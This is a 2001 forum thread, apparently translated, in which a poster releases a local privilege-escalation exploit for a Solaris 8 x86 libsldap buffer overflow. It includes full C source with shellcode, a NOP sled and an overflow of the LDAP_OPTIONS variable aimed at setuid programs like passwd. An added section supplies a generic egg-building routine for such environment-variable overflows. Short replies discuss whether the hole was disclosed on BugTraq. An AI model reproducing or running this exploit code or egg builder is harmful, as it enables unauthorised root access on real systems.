[ slash @ 17.07.2001. 12:53 ] @
Normally I keep my exploits to myself, but I decided to release this one.
http://anti.security.is

I also wrote an exploit for SPARC, so whoever is interested, mail me.

/*
 * Local Solaris 8 (x86) libsldap Exploit
 * by slash <[email protected]>
 *
 * argv[1] can be passwd, yppasswd, nispasswd, sendmail,
 * chkey etc. Use the ldd command to find more programs
 * that are linked against the libsldap library. Maybe it would
 * be a good idea to play with the overflow egg by changing
 * the buffer size or RETPOS.
 *
 * Word up to Adam Beyer, Cris Liebing and Gayle San that
 * played @ Rotor 2001 - Experience
 *
 * PRIVATE !!! DO NOT DISTRIBUTE !!! PRIVATE !!!
 *
 * *note* slightly broken for public
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SIZE 331
#define NOP 0x90
#define RETPOS 251
#define ENV "LDAP_OPTIONS"

/* Solaris/x86 shellcode: patches its own NUL bytes in at run time,
 * then execs /tmp/xx (the ksh symlink created in main below) */
char shellcode[] =
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
"\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";

/* current stack pointer, used as the default return address guess
 * (the value is left in %eax, which is where gcc on x86 reads the result) */
unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main (int argc, char *argv[])
{
    char buffer[SIZE + 1];          /* +1: setenv() needs a NUL terminator */
    char *program;
    int i, offset;
    unsigned long ret;

    if (argc < 2) {
        printf ("Usage: %s </path/to/program> [offset] [ret]\n", argv[0]);
        exit (EXIT_FAILURE);
    }
    printf ("Local Solaris 8 (x86) libsldap Exploit\n");
    printf ("by slash <[email protected]>\n\n");

    program = argv[1];
    offset = (argc > 2) ? atoi(argv[2]) : 0;

    if (argc < 4)
    {
        ret = get_sp();
    } else
    {
        ret = strtoul(argv[3], NULL, 0);
        //sanity cheq: a zero byte would end the string before the egg is complete
        if(!(ret & 0xff) || !(ret & 0xff00) ||
           !(ret & 0xff0000) || !(ret & 0xff000000))
        {
            printf("Your return address contains a zero-byte !\n");
            exit(EXIT_FAILURE);
        }
    }
    /* egg: NOP sled, then the shellcode ending at byte 249 */
    for (i = 0; i < 250 - strlen(shellcode); i++) {
        buffer[i] = NOP;
    }
    for (i = 250 - strlen(shellcode); i < 250; i++) {
        buffer[i] = shellcode[i - (250 - strlen(shellcode))];
    }
    buffer[250] = NOP;              /* the one byte between shellcode and RETPOS */
    /* from RETPOS on: the return address, repeated up to SIZE */
    for (i = RETPOS; i < SIZE; i = i + 4) {
        *(long *)&buffer[i] = ret + offset;
    }
    buffer[SIZE] = '\0';
    printf ("Offset [%d] - Return Address [0x%lx]\n", offset, ret + offset);
    system ("/bin/ln -s /bin/ksh /tmp/xx");
    setenv (ENV, buffer, 1);
    execl (program, "1337", (char *)0);
    return 0;
}
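The egg in the post above has a fixed shape: NOP sled, shellcode ending at byte 250, then the return address repeated from RETPOS to the end of the buffer, all delivered through an environment variable. The following is an added example, not slash's code and not part of the original post, that builds that layout for arbitrary sizes (so SIZE and RETPOS can be "played with" as the header suggests) and applies the check the post only does for a user-supplied address: because setenv()/getenv() treat the value as a C string, any NUL byte in the shellcode, the padding or the address silently truncates the egg, so the builder refuses such input instead of shipping a short egg. The shellcode, sizes and address used in main() are constructed placeholders.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EGG_NOP 0x90

/*
 * Build an environment-variable overflow egg of the shape
 *
 *   [ NOP sled ][ shellcode, ending at sc_end ][ NOP pad ][ ret ret ret ... ]
 *
 * out must have room for size + 1 bytes (the trailing NUL setenv() wants).
 * ret is the final 32-bit address to write (i.e. base + offset).
 * Returns the egg length, or -1 when the layout is impossible or when a NUL
 * byte would land inside the egg and truncate it on the way through environ.
 */
long build_egg(unsigned char *out, size_t size,
               const unsigned char *sc, size_t sclen,
               size_t sc_end, size_t retpos, uint32_t ret)
{
    size_t i;

    if (sclen > sc_end || sc_end > retpos || retpos + sizeof ret > size)
        return -1;

    /* reject a zero byte in the address up front; the post's sanity check */
    for (i = 0; i < sizeof ret; i++)
        if (((ret >> (8 * i)) & 0xffu) == 0)
            return -1;

    memset(out, EGG_NOP, sc_end - sclen);            /* sled */
    memcpy(out + sc_end - sclen, sc, sclen);         /* shellcode */
    memset(out + sc_end, EGG_NOP, retpos - sc_end);  /* gap up to retpos */

    /* the address in native byte order, repeated while a whole copy fits */
    for (i = retpos; i + sizeof ret <= size; i += sizeof ret)
        memcpy(out + i, &ret, sizeof ret);
    for (; i < size; i++)                            /* tail too short for a copy */
        out[i] = EGG_NOP;

    out[size] = '\0';
    /* strlen() is exactly the truncation getenv() would apply: if anything
       in the shellcode or padding was 0x00, the visible egg is shorter */
    if (strlen((const char *)out) != size)
        return -1;
    return (long)size;
}

int main(void)
{
    /* constructed stand-in for real shellcode: 16 int3 instructions */
    unsigned char sc[16];
    unsigned char egg[331 + 1];
    long n;

    memset(sc, 0xcc, sizeof sc);

    /* same geometry as the post: SIZE 331, shellcode ends at 250, RETPOS 251 */
    n = build_egg(egg, 331, sc, sizeof sc, 250, 251, 0x08047a1cu);
    printf("egg length %ld, sled %zu bytes, %zu address copies\n",
           n, 250 - sizeof sc, (331 - 251) / 4);

    /* an address with a zero byte is refused rather than producing a short egg */
    n = build_egg(egg, 331, sc, sizeof sc, 250, 251, 0x08040000u);
    printf("address with zero byte -> %ld\n", n);
    return 0;
}
```

Pass the address you actually intend to write (base plus offset) as ret; the post checks only the base, so a negative offset that crosses a 256-byte boundary can still introduce a zero byte, which this builder catches.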



[ UroS @ 20.07.2001. 16:39 ] @
it's not spelled cris liebing, it's chris liebing...
[ slash @ 21.07.2001. 10:57 ] @
Quote:
UroS wrote:
it's not spelled cris liebing, it's chris liebing...



correct :) my bad :)
[ Mikky @ 16.08.2001. 16:05 ] @
did you notify the open source community about this hole, and in general, when you find a vulnerability yourself, do you notify the vendor so they release a patch,
or do you keep quiet and save the exploit to use when you need it?
[ Vojislav Milunovic @ 16.08.2001. 19:57 ] @
Well, this hole was on BugTraq... you just have to follow the list ;o)
[ Mikky @ 16.08.2001. 22:32 ] @
so slash discovered it and reported it to bugtraq
if so, respect
[ Vojislav Milunovic @ 17.08.2001. 02:31 ] @
Well, whether he discovered it I don't know, you'll have to ask him ;o) although I can look on securityfocus.com to see who found it ;o)
[ Vojislav Milunovic @ 17.08.2001. 02:36 ] @
http://www.securityfocus.com/archive/1/195015

here's the link, read who found the bug and how; it was on BugTraq